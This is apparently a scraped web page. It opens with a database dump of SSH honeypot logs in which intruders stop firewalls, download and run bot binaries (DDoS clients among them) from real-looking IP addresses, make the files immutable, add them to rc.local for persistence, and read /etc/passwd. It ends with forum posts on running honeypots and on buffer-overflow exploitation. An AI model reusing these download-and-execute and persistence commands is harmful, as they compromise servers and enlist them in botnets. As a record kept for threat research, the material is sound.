217,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:15",\N,1,"exit"
218,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:47",\N,1,"ls"
219,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:52",\N,1,"cat /etc/passwd"
220,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:27",\N,1,"ls"
221,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:29",\N,1,"exit"
222,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:31",\N,0,"quit"
223,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:33",\N,1,"exit"
224,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:41",\N,1,"exit"
225,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:26",\N,0,"service iptables stop"
226,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:30",\N,1,"wget http://111.73.45.158:881/a54321"
227,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:34",\N,1,"chmod 0777 a54321"
228,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:38",\N,0,"./a54321 &"
229,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:42",\N,1,"chattr +i a54321"
230,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:46",\N,1,"wget http://111.73.45.158:881/b54321"
231,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:50",\N,1,"chmod 0777 b54321"
232,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:54",\N,0,"./b54321 &"
233,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:58",\N,1,"chattr +i b54321"
234,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:02",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
235,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:06",\N,1,"echo \"./a54321&\">>/etc/rc.local"
236,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:10",\N,1,"echo \"./b54321&\">>/etc/rc.local"
237,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
238,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:18",\N,1,"whoami"
239,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:47",\N,0,"service iptables stop"
240,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:51",\N,1,"wget http://111.73.45.158:881/a54321"
241,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:55",\N,1,"chmod 0777 a54321"
242,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:59",\N,0,"./a54321 &"
243,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:03",\N,1,"chattr +i a54321"
244,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:07",\N,1,"wget http://111.73.45.158:881/b54321"
245,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:11",\N,1,"chmod 0777 b54321"
246,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:15",\N,0,"./b54321 &"
247,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:19",\N,1,"chattr +i b54321"
248,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:23",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
249,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:27",\N,1,"echo \"./a54321&\">>/etc/rc.local"
250,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:31",\N,1,"echo \"./b54321&\">>/etc/rc.local"
251,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:35",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
252,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:39",\N,1,"whoami"
253,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:35",\N,1,"ps -ef"
254,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:39",\N,1,"pwd"
255,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:35",\N,1,"ls"
256,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:37",\N,1,"pwd"
257,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:38",\N,1,"ifconfig"
258,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:50",\N,1,"wget http://222.186.31.11:1/lan2.6"
259,"337bfaf47c6811e4b3d002b6d5d64ab8","2014-12-05 10:19:40",\N,1,"uname -a"
260,"1a59dfa87ce711e4b3d002b6d5d64ab8","2014-12-06 01:28:12",\N,1,"uname -a"
261,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:27",\N,0,"/etc/init.d/iptables stop"
262,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:31",\N,0,"service iptables stop"
263,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:35",\N,0,"SuSEfirewall2 stop"
264,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:39",\N,0,"reSuSEfirewall2 stop"
265,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:43",\N,1,"wget http://115.239.224.241:11111/slan"
266,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:47",\N,1,"chmod 0777 slan"
267,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:51",\N,0,"./slan &"
268,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:55",\N,1,"chattr +i slan"
269,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:59",\N,1,"wget http://115.239.224.241:11111/ulan"
270,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:03",\N,1,"chmod 0777 ulan"
271,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:07",\N,0,"./ulan &"
272,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:11",\N,1,"chattr +i ulan"
273,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:15",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
274,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:19",\N,1,"echo \"./slan&\">>/etc/rc.local"
275,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:23",\N,1,"echo \"./ulan&\">>/etc/rc.local"
276,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:27",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
277,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:31",\N,1,"whoami"
278,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:18",\N,1,"w"
279,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:21",\N,1,"ps -ef"
280,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:49",\N,1,"ls"
281,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:52",\N,1,"pwd"
282,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:58",\N,1,"cd /"
283,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:03",\N,1,"ls"
284,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:05",\N,1,"exit"
285,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:51",\N,0,"test"
286,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:53",\N,0,"something"
287,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:54",\N,1,"exit"
288,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:29",\N,1,"uname -a"
289,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:43",\N,1,"wget http://121.40.19.239:52365/DDosClient"
290,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:50",\N,0,"service iptables stop"
291,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:54",\N,1,"wget http://115.239.248.208:5252/Gates"
292,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:58",\N,1,"chmod 0777 Gates"
293,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:02",\N,0,"./Gates &"
294,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:06",\N,1,"chattr +i Gates"
295,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
296,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:14",\N,1,"echo \"./Gates&\">>/etc/rc.local"
297,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
298,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:22",\N,1,"whoami"
299,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:10",\N,0,"service iptables stop"
300,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:14",\N,1,"wget http://115.239.248.208:5252/Gates2.4"
301,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:18",\N,1,"chmod 0777 Gates2.4"
302,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:22",\N,0,"./Gates2.4 &"
303,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:26",\N,1,"chattr +i Gates2.4"
304,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:30",\N,1,"wget http://115.239.248.208:5252/GatesFreeBsd"
305,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:34",\N,1,"chmod 0777 GatesFreeBsd"
306,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:38",\N,0,"./GatesFreeBsd &"
307,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:42",\N,1,"chattr +i GatesFreeBsd"
308,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:46",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
309,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:50",\N,1,"echo \"./Gates2.4&\">>/etc/rc.local"
310,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:54",\N,1,"echo \"./GatesFreeBsd&\">>/etc/rc.local"
311,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
312,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:41:02",\N,1,"whoami"
313,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:47",\N,1,"ls"
314,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"cd /"
315,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"ls"
316,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:57",\N,1,"cat /etc/passwd"
317,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:01",\N,1,"exit"
318,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:04",\N,0,"testing"
319,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:06",\N,0,"testing"
320,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:17",\N,0,"ip"
321,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:21",\N,1,"ifconfig"
322,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:34",\N,1,"wget h5tt"
323,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:03",\N,1,"wget http://216.99.157.168:8080/meng"
324,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:19",\N,1,"wget http://216.99.157.168:8080/meng"
325,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:38",\N,1,"wget http://216.99.157.168:8080/jin1"
326,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:18:38",\N,1,"wget http://216.99.157.168:8080/xixi"
327,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:05",\N,1,"ps -ef | grep libvirtdsdd"
328,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:35",\N,0,"ethtool eth0"
329,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:43",\N,1,"ps -aux"
330,"42c7255eab8611e4af3102b6d5d64ab8","2015-02-03 09:23:27",\N,1,"wget http://216.99.157.168:8080/meng"
331,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:09",\N,1,"uptime"
332,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:19",\N,1,"ifconfig"
333,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:29",\N,1,"wget http://121.41.88.50:88/AliApp"
334,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:33",\N,1,"chmod 777 AliApp"
335,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:37",\N,0,"./AliApp"
336,"30862ab2b93611e4af3102b6d5d64ab8","2015-02-20 19:25:22",\N,1,"w"
337,"6442e138b93611e4af3102b6d5d64ab8","2015-02-20 19:26:46",\N,1,"w"
338,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:02:59",\N,1,"cd /tmp"
339,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:03:08",\N,1,"wget http://183.136.213.96:8090/10091"
340,"9c3b27c2bcc311e4af3102b6d5d64ab8","2015-02-25 07:55:12",\N,1,"uname -a"
341,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:27",\N,1,"rm *"
342,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:31",\N,0,"curl -o /tmp/gnkk-d http://222.186.52.53:3377/gnkk-d"
343,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:35",\N,1,"wget -c http://hackerxxy.3322.org:3377/gnkk-d"
344,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:39",\N,1,"chmod 777 /tmp/./gnkk-d"
345,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:43",\N,1,"chmod 777 /tmp/gnkk-d"
346,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:47",\N,0,"/tmp/./gnkk-d"
347,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:51",\N,0,"/tmp/gnkk-d"
348,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:55",\N,1,"cd /tmp"
349,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:59",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
350,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:03",\N,1,"echo \"./gnkk-d&\">>/etc/rc.local"
351,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:07",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
352,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:11",\N,1,"rm /tmp/*"
353,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:15",\N,1,"wget http://hackerxxy.3322.org:3377/xy-32"
354,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:19",\N,1,"chmod 777 xy-32"
355,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:23",\N,1,"chmod u+x xy-32"
356,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:27",\N,0,"./xy-32&"
357,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:31",\N,1,"nohup /root/xy-32& > /dev/null 2>&1 &"
358,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:35",\N,1,"cd /tmp"
359,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:39",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
360,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:43",\N,1,"echo \"./xy-32&\">>/etc/rc.local"
361,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
362,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:50",\N,0,"service iptables stop"
363,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:54",\N,1,"wget wget http://222.186.31.73:8080/Manager"
364,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:58",\N,1,"chmod 0777 Manager"
365,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:02",\N,0,"./Manager &"
366,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:06",\N,1,"chattr +i Manager"
367,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
368,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:14",\N,1,"echo \"./Manager&\">>/etc/rc.local"
369,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
370,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:22",\N,1,"whoami"
371,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:13:47",\N,1,"wget http://218.244.148.238:8080/bin.sh"
372,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:00",\N,1,"chmod 0755 ./bin.sh"
373,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:11",\N,1,"nohup ./bin.sh> /dev/null 2>&1 &"
374,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:23",\N,0,"curl http://218.244.148.238:8080/npc -o /tmp/npc"
375,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:35",\N,1,"chmod 0755 /tmp/./npc"
376,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:47",\N,0,"/tmp/./npc"
377,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:59",\N,1,"wget http://218.244.148.238:8080/npc"
378,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:11",\N,1,"chmod 0755 ./npc"
379,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:23",\N,0,"./npc"
380,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:35",\N,0,"curl http://218.244.148.238:8080/npc1 -o /tmp/npc1"
381,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:47",\N,1,"chmod 0755 /tmp/./npc1"
382,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:59",\N,0,"/tmp/./npc1"
383,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:11",\N,1,"wget http://218.244.148.238:8080/npc1"
384,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:23",\N,1,"chmod 0755 ./npc1"
385,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:35",\N,0,"./npc1"
386,"495dc05acd8a11e4af3102b6d5d64ab8","2015-03-18 16:17:38",\N,1,"wget -O /tmp/Gatesz http://61.147.121.113:3221/Gatesz"
387,"bb9120bad17a11e4af3102b6d5d64ab8","2015-03-23 16:36:40",\N,1,"echo \"WinSCP: this is end-of-file:0\""
388,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:44",\N,0,"service iptables stop"
389,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:48",\N,1,"wget http://117.21.176.54:9191/choushabi"
390,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:52",\N,1,"chmod 0755 /root/choushabi"
391,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:56",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
392,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:00",\N,1,"chmod 777 choushabi"
393,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:04",\N,0,"./choushabi"
394,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:08",\N,1,"chmod 0755 /root/choushabi"
395,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,1,"nohup /root/choushabi &gt"
396,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"/dev/null 2&gt"
397,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"&amp"
398,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"1 &amp"
399,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:16",\N,1,"chmod 0777 choushabi"
400,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:08",\N,0,"service iptables stop"
401,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:12",\N,1,"wget http://117.21.176.54:9191/choushabi"
402,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:16",\N,1,"chmod 0755 /root/choushabi"
403,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:20",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
404,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:24",\N,1,"chmod 777 choushabi"
405,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:28",\N,0,"./choushabi"
406,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:32",\N,1,"chmod 0755 /root/choushabi"
407,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,1,"nohup /root/choushabi &gt"
408,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"/dev/null 2&gt"
409,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"&amp"
410,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"1 &amp"
411,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:40",\N,1,"chmod 0777 choushabi"
412,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:44",\N,1,"chmod u+x choushabi"
413,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:48",\N,0,"./choushabi &"
414,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:52",\N,1,"chmod u+x choushabi"
415,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:56",\N,0,"./choushabi &"
416,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:00",\N,1,"cd /tmp"
417,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:04",\N,0,"service iptables stop"
418,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:08",\N,1,"wget http://117.21.176.54:9191/choushabi"
419,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:12",\N,1,"chmod 0755 /root/choushabi"
420,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:16",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
421,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:20",\N,1,"chmod 777 choushabi"
422,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:24",\N,0,"./choushabi"
423,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:28",\N,1,"chmod 0755 /root/choushabi"
424,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,1,"nohup /root/choushabi &gt"
425,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"/dev/null 2&gt"
426,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"&amp"
427,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"1 &amp"
428,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:36",\N,1,"chmod 0777 choushabi"
429,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:40",\N,1,"chmod u+x choushabi"
430,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:44",\N,0,"./choushabi &"
431,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:48",\N,1,"chmod u+x choushabi"
432,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:52",\N,0,"./choushabi &"
433,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:56",\N,1,"cd /tmp"
434,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:00",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
435,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:04",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
436,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:08",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
437,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:12",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
438,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:46",\N,0,"/etc/init.d/iptables stopservice iptables stop"
439,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:52",\N,0,"SuSEfirewall2 stopreSuSEfirewall2 stop"
440,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:58",\N,1,"cd /tmp"
441,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:04",\N,1,"wget -c http://117.21.176.79:333/l3600"
442,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:10",\N,1,"chmod 777 l3600"
443,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:16",\N,0,"./l3600"

9
Hacking and Security / Re: Detect Honeypot or IDS on the target.
« on: June 22, 2015, 04:03:36 pm »
Interesting stuffs. I also had mostly Asian IPs and the worst.wordlists.evar. But I actually got a bunch of post-login activity logs lying around. I'll threadjack the shit out of this thread (I was looking for excuse to talk about honeypots) and post some of my findings once I'm done with work.

10
Hacking and Security / Re: Detect Honeypot or IDS on the target.
« on: June 22, 2015, 03:17:31 pm »
Yep.

...

...

...

When I set up honey pots, they are usually running SSH or FTP, and they usually have default or shit credits on purpose. I do this cuz I don't give a shit about password lists or source IPs... I want to see what scripts they are running and what files they are pulling down to escalate/traverse and what their botnet infra looks like. I might even poke at their infrastructure.

Next, I give it an enticing name, like REGISTER or CONFIDENTIAL or SECRET, so the assholes might bother to manually poke around. Generally, those folks don't find shit. I've been thinking about about throwing in some macro docs to honey badger their asses, but ehhhh, lot of work, and i'm not dumb enough to poke the bear for drivebye shit.

So to summarize, if you think you've just hacked the Gibson with admin:admin, and the hostname is recognizably retarded, and you don't find shit on the endpoint (either user files or useful services running), then rest assured, I have logs that show you're dumb. Errr, I mean, you've found a honey pot.

On IDS... I haven't seen a lot of host-based IDS, just network IDS. In that case, you are not gonna' detect it, because all your network traffic is being replicated to the IDS off the beaten path... that is, IDS generally doesn't sit between you and your target. Instead, it's getting aggregate logs from everywhere. IPS is probably easier to "detect" but I'm gonna' go ahead and let you figure how how/why.

11
Beginner's Corner / Re: What are the most common ways vulnerabilities and exploits are found?
« on: June 22, 2015, 02:59:14 pm »
@isigod: np, controlling EIP is where the journey begins. Once you got the debugger open and you own EIP, you'll have to take good notes on where key memory addresses are: beginning of buffer, end of buffer, where in your buffer your shell code is, etc. Basically, use a hex calculator to figure how how many bytes deep you need to go. Remember, you're trying to control registers to push your shell code on top of the stack.

@dotzilla: so TECHNICALLY you don't need to know much coding or any C/C++, but sweet jesus, it's probably helpful. I think the minimum is to know a tiny bit of Python so you can actually point your buffer at something, and then you need to not be afraid of debuggers. I don't think you actually need to know assembly language, other than EIP, ESP, memory addresses, and how shit gets on top of the stack (though one might arguing that is knowing assembly language, LOL). That is, of course, unless you're more advanced than me and are writing your own shellcode instead of just ganking it from ExploitDB. Then again, ExploitDB shellcode will often tip IDS/IPS, but it's not like any of us are throwing this code at anyone, right????? Right?????

12
General discussion / Re: That Film Script Though
